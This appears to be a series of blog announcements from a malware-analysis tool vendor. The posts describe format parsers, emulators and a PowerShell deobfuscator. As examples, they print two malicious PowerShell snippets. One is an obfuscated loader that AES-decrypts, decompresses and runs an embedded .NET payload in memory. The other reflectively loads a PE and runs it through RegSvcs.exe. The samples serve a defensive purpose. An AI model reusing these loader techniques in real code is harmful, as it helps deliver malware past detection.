We have released the “PList Format” package for all licenses of Cerbero Suite Standard and Advanced. This package provides support for Apple’s property list files.
PList files can be either XML files or binary files: both formats are supported.
We have released the “ISO Format” package for all licenses of Cerbero Suite Standard and Advanced.
A quick 70-seconds introduction to Silicon Shellcode Emulator: a lightweight x86/x64 emulator designed for Windows shellcode. This package is available to all commercial licenses of Cerbero Suite Advanced.
We have released the URL Extractor package for all licenses of Cerbero Suite Advanced! This package prints out URLs detected when scanning a file.
In this specific image, URL Extractor detected a URL inside a VBS script contained in a Cabinet archive stored in the resources of an executable inside a OneNote document inside a Zip archive.
As of today, the “OneNote Format” package is available to all licenses of Cerbero Suite! The package was previously released for commercial licenses only.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.
We have released version 2.0 of our commercial PowerShell Beautifier package. The new release adds the option to remove unused variables.
For example, this is a snippet of a malicious script:
$T = 'Get' $M = $T + 'Method' $I = 'Invoke' $T = $T + 'Type' $L = 'Load' $Q0 = [Reflection.Assembly] $B = $Q0::$L($MyS) $B = $B.$T('NewPE2.PE') $B = $B.$M('Execute') $Ub = 'C:\Windows\Microsoft' $z = $Ub + '.NET\Framewor' $VT = $z + 'k\v4.0.30' $XQ = $VT + '319\RegSvcs.exe' $B = $B.$I($null,[object[]] ($XQ,$serv))
With both variable replacement and removal of unused variables enabled it becomes:
$load_result = [Reflection.Assembly]::Load($x_result) $get_type_result = $load_result.GetType('NewPE2.PE') $get_method_result = $get_type_result.GetMethod('Execute') $invoke_result = $get_method_result.Invoke($null, [object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', $x_result_2))
We have released the “TAR Format” package for all licenses of Cerbero Suite Standard and Advanced.
The package is also exposed to the SDK:
from Pro.Core import * from Pkg.TAR import * def parseTARArchive(fname): c = createContainerFromFile(fname) if c.isNull(): return obj = TARObject() if not obj.Load(c) or not obj.ParseArchive(): return curoffs = None while True: entry, curoffs = obj.NextEntry(curoffs) if entry == None: break # skip directories if obj.IsDirectory(entry): continue print("file name:", entry.name, "file offset:", str(entry.offset_data), "file size:", str(entry.size)) # retrieves the file data as NTContainer fc = obj.GetEntryData(entry)
PowerShell code is often seen in malware. To help the analysis of such code we have just released the “PowerShell Beautifier” package. The package is available to all commercial licenses of Cerbero Suite Advanced.
The package features a complete parser for the PowerShell language and has many deobfuscation capabilities. If your organization is interested in integrating our PowerShell beautifier in a cloud service, please contact us.
The beautifier can be invoked as an action: Ctrl+R -> PowerShell -> PowerShell Beautifier.
Let’s look at an example of obfuscated PowerShell code:
$mcWPL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%~f0').Split([Environment]::NewLine);foreach ($jBqHb in $mcWPL) { if ($jBqHb.StartsWith(':: ')) { $qUflk = $jBqHb.Substring(3); break; }; };$AKzOG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qUflk);$GTqqO = New-Object System.Security.Cryptography.AesManaged;$GTqqO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GTqqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GTqqO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYCDvAfAeZYTmiLeZKnw0z4us9jgkCckB7mS60qxxg4=');$GTqqO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JYh62EWEKCuIH7WrUJ0VdA==');$QTfFw = $GTqqO.CreateDecryptor();$AKzOG = $QTfFw.TransformFinalBlock($AKzOG, 0, $AKzOG.Length);$QTfFw.Dispose();$GTqqO.Dispose();$xVFCH = New-Object System.IO.MemoryStream(, $AKzOG);$qGLhv = New-Object System.IO.MemoryStream;$wRtOX = New-Object System.IO.Compression.GZipStream($xVFCH, [IO.Compression.CompressionMode]::Decompress);$wRtOX.CopyTo($qGLhv);$wRtOX.Dispose ();$xVFCH.Dispose();$qGLhv.Dispose();$AKzOG = $qGLhv.ToArray();$VBqqY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($AKzOG);$ReoQh = $VBqqY.EntryPoint;$ReoQh.Invoke($null, (, [string[]] ('%*')))
To help in the analysis of malware which uses Windows batch scripts we just released a package on Cerbero Store called “Simple Batch Emulator”. The name of the package is self-explanatory as it provides a basic emulator for batch scripts. The package is available to all commercial licenses of Cerbero Suite Advanced.
The following is a malicious OneNote document. All embedded files are automatically extracted thanks to the “OneNote Format” package.
Two of the embedded files are batch scripts. We can execute the action to emulate the obfuscated batch code.
Microsoft OneNote is rising in popularity as a vector for malware. Therefore, all commercial licenses of Cerbero Suite can now download our “OneNote Format” package from Cerbero Store which parses the OneNote format and extracts embedded files.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.